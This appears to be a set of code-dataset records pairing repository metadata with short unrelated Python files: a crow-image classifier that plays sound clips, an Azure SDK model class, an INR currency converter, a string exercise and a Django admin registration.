"""
def print_standings(entries: Sequence[StandingsEntry]) -> str:
return _column_headings() + _standings_entries(entries) + _legend()
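# Illustrative sketch only -- how this module might be used. StandingsEntry
# comes from the separate `model` module and its constructor is not shown
# here, so the loading step below is an assumption:
#
#   entries = load_sorted_standings()   # some sequence of StandingsEntry
#   report = print_standings(entries)
#   print(report)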
| [
"[email protected]"
] | |
50509f1fcaee6a8db649657d24ee5a29044b19e6 | 6932a9ae700a623f16a3aef417d0598cf6d4f389 | /karasu_speak.py | c8c028b30786e6c5b67abc979a0d40f60e63f06a | [
"MIT"
] | permissive | MuAuan/hirakegoma | 9f1a252d913749a2c16ae5bd7a8870550048d26d | 861879af1016c25b7a14bcabe543bfba47fd57f3 | refs/heads/master | 2020-04-27T20:12:25.315594 | 2019-03-24T12:38:30 | 2019-03-24T12:38:30 | 174,649,241 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | # -*- coding: utf-8 -*-
import cv2
import pyaudio
import sys
import time
import wave
import pydub
from pydub import AudioSegment
import moviepy.editor as mp
import datetime
import os
from vgg16_like import model_family_cnn
from keras.preprocessing import image
import matplotlib.pyplot as plt
import keras
import numpy as np
def prediction(imgSrc,model):
#np.random.seed(1337) # for reproducibility
img_rows,img_cols=128, 128
img = np.array(imgSrc)
img = img.reshape(1, img_rows,img_cols,3)
img = img.astype('float32')
img /= 255
t0=time.time()
y_pred = model.predict(img)
return y_pred
def karasu_responder(model,path,img_rows,img_cols):
imgSrc=[]
#for j in range(0,100000,1):
# j += 1
imgSrc = image.load_img(path, target_size=(img_rows,img_cols))
#plt.imshow(imgSrc)
#plt.pause(1)
#plt.close()
pred = prediction(imgSrc,model)
#print(pred[0])
if pred[0][0]>=0.5:
filename = "karasu-miyama_out1.wav"
print("angry")
elif pred[0][1]>=0.5:
#filename = "karasu_kero_out3.wav"
filename = "karasu-normal_out1.wav"
print("normal")
elif pred[0][2]>=0.5:
#filename = "karasu_kero_out1.wav"
filename = "karasu-others_out1.wav" #karasu-hageshii_out.wav
print("others")
return filename
num_classes = 3
img_rows,img_cols=128, 128
input_shape = (img_rows,img_cols,3)
model = model_family_cnn(input_shape, num_classes = num_classes)
# load the weights from the last epoch
model.load_weights('params_karasu-0angry-1normal-2others.hdf5', by_name=True)
print('Model loaded.')
path = "./out_test/figure.jpg"
img_rows,img_cols=128,128
s=0
while True:
if os.path.exists(path)==True:
s += 1
for j in range(0,50000000,1):
j += 1
"""
if s%3 == 0:
path="./out_test/figure_angry.jpg"
elif s%3 == 1:
path="./out_test/figure_normal.jpg"
else:
path="./out_test/figure_others.jpg"
"""
filename=karasu_responder(model,path,img_rows,img_cols)
wf = wave.open(filename, "rb")
        # Specify the chunk size
CHUNK1 = 1024
#filename = "hirakegoma.wav"
wf = wave.open(filename, "rb")
        # Create a PyAudio instance
p1 = pyaudio.PyAudio()
        # Open an output stream
stream1 = p1.open(format=p1.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
        # Read 1024 frames of data at a time
input1 = wf.readframes(CHUNK1)
        # Play back the audio
while stream1.is_active():
output = stream1.write(input1)
input1 = wf.readframes(CHUNK1)
if input1==b'':
os.remove(path)
break
| [
"[email protected]"
] | |
34179ff136b9b68223fd42cb9f5fbe54e95a88de | af0dcf80a36da4ac6894dc517ad1870f702c3122 | /azure-mgmt-web/azure/mgmt/web/models/csm_publishing_profile_options.py | 99b9542ab7d50b0a1d29b9d31f8743561ff5afa3 | [
"Apache-2.0"
] | permissive | FlavioAlexander/azure-sdk-for-python | 4c6151ca17886f9e4d47e1ccc469859abdedca5a | 8c7416749f9a5697e0311bc9af8fe5c0d524ca03 | refs/heads/master | 2021-01-24T02:34:37.194767 | 2016-07-03T23:47:23 | 2016-07-03T23:47:23 | 62,738,173 | 0 | 1 | null | 2016-07-06T16:54:12 | 2016-07-06T16:54:10 | null | UTF-8 | Python | false | false | 1,346 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CsmPublishingProfileOptions(Model):
"""Publishing options for requested profile.
:param format: Name of the format. Valid values are:
FileZilla3
WebDeploy -- default
Ftp
:type format: str
"""
_attribute_map = {
'format': {'key': 'format', 'type': 'str'},
}
def __init__(self, format=None):
self.format = format
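# Illustrative sketch only (not part of the generated SDK): requesting, for
# example, an FTP publishing profile could be expressed as
#
#   options = CsmPublishingProfileOptions(format='Ftp')
#
# where the valid format values are the ones listed in the class docstring.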
| [
"[email protected]"
] | |
b1df1327d79b654f1819f0289b69a4ab8c88928c | ee052bcf1a0836156c5d97a6a0aa4ed45dc19716 | /currencyConverter.py | 8d73a79f044e27d75dfad40f3bd5cdf6c483e90e | [] | no_license | JATIN-RATHI/CurrencyConverter | 194f88166cece1f30a97cf0bc1ef6f4884d3c5a1 | ca15cdb3ab6f87180460d8bf572a7816d7928015 | refs/heads/master | 2022-11-21T03:04:57.031541 | 2020-07-23T09:43:43 | 2020-07-23T09:43:43 | 281,911,713 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,952 | py | # Link :---> https://www.x-rates.com/table/?from=INR&amount=1
if __name__ == '__main__':
with open('currencyDATA') as f:
lines = f.readlines()
dict = {}
for line in lines:
parsed = line.split("\t")
dict[parsed[0]] = parsed[1]
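        # Assumed layout of `currencyDATA` (not shown in the source): one
        # tab-separated "<currency name>\t<rate per 1 INR>" pair per line, e.g.
        #   US Dollar   0.0134
        #   Euro        0.0114
        # so parsed[0] is the currency name and parsed[1] its conversion rate.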
print("Choose any one to convert Indian currency into : \n1: Argentine Peso\n2: Australian Dollar\n3: Bahraini "
"Dinar\n4: Botswana Pula\n5: Brazilian Real\n6: British Pound\n7: Bruneian Dollar\n8: Bulgarian Lev\n9: "
"Canadian Dolla\n10: Chilean Peso\n11: Chinese Yuan Renminbi\n12: Colombian Peso\n13: Croatian Kuna\n14: "
"Czech Koruna\n15: Danish Krone\n16: Emirati Dirham\n17: Euro\n18: Hong Kong Dollar\n19: Hungarian "
"Forint\n20: Icelandic Krona\n21: Indonesian Rupiah\n22: Iranian Rial\n23: Israeli Shekel\n24: Japanese "
"Yen\n25: Kazakhstani Tenge\n26: Kuwaiti Dinar\n27: Libyan Dinar\n28: Malaysian Ringgit\n29: Mauritian "
"Rupee\n30: Mexican Peso\n31: Nepalese Rupee\n32: New Zealand Dollar\n33: Norwegian Krone\n34: Omani "
"Rial\n35: Pakistani Rupee\n36: Philippine Peso\n37: Polish Zloty\n38: Qatari Riyal\n39: Romanian New "
"Leu\n40: Russian Ruble\n41: Saudi Arabian Riyal\n42: Singapore Dollar\n43: South African Rand \n44: "
"South Korean Won\n45: Sri Lankan Rupee\n46: Swedish Krona\n47: Swiss Franc\n48: Taiwan New Dollar\n49: "
"Thai Baht\n50: Trinidadian Dollar\n51: Turkish Lira\n52: US Dollar\n53: Venezuelan Bolivar")
choose = int(input("Enter your choice : ")) - 1
name = dict.keys()
key_list = list(name)
currency_name = key_list[choose]
amt = dict.values()
value_list = list(amt)
currency_value = value_list[choose]
amount = int(input("Enter amount to be converted: "))
total = amount * float(currency_value)
print(f"{amount} Indian Rupee = {total} {currency_name} ")
| [
"[email protected]"
] | |
c4be81c83c88067b9cf207fdeb2ab275f44e2c08 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /F4iemEeFfsaFoMpAF_4.py | 786cba909da3a937ac21071a5cc1d90693d4e336 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 776 | py | """
This is a list of single characters with an unwanted character at the end:
["H", "e", "l", "l", "o", "!", "\0"]
You could also just type "Hello!" when initializing a variable, creating the
string "Hello!"
Create a function that will return a string by combining the given character
list, not including the unwanted final character.
### Examples
cpp_txt(["H", "i", "!", "\0"]) ➞ "Hi!"
cpp_txt(["H", "e", "l", "l", "o", "!", "\0"]) ➞ "Hello!"
cpp_txt(["J", "A", "V", "a", "\0"]) ➞ "JAVa"
### Notes
This is a translation of a C++ challenge and is trivial in Python, but perhaps
it will be helpful to someone out there. (No challenge is trivial until you
know how to solve it :)
"""
def cpp_txt(lst):
return ''.join(lst[:-1])
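# Added quick check (not in the original file): exercises cpp_txt with the
# examples given in the docstring above.
if __name__ == "__main__":
    assert cpp_txt(["H", "i", "!", "\0"]) == "Hi!"
    assert cpp_txt(["H", "e", "l", "l", "o", "!", "\0"]) == "Hello!"
    assert cpp_txt(["J", "A", "V", "a", "\0"]) == "JAVa"
    print("All docstring examples pass.")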
| [
"[email protected]"
] | |
6068e0dfbaa8b3e02df630a1f8f2d8551b444403 | 2eaecdb1ed42170463993b8b2285296c5ef2231d | /apps/ciudad/admin.py | d7e080b95887458bf100d3a8e00e6edfdc8c6041 | [] | no_license | ivanfdaza/tribunaleclesiasticoIIS | 9639fc66a2c99baa45b8276f4a1e035bdf294e2e | acb164ab8464b71d0461acf03bdd5e3386b57893 | refs/heads/master | 2022-11-21T10:32:14.925326 | 2020-07-23T16:21:26 | 2020-07-23T16:21:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from django.contrib import admin
# Register your models here.
from apps.ciudad.models import Ciudad, Departamento
admin.site.register(Ciudad)
admin.site.register(Departamento) | [
"[email protected]"
] |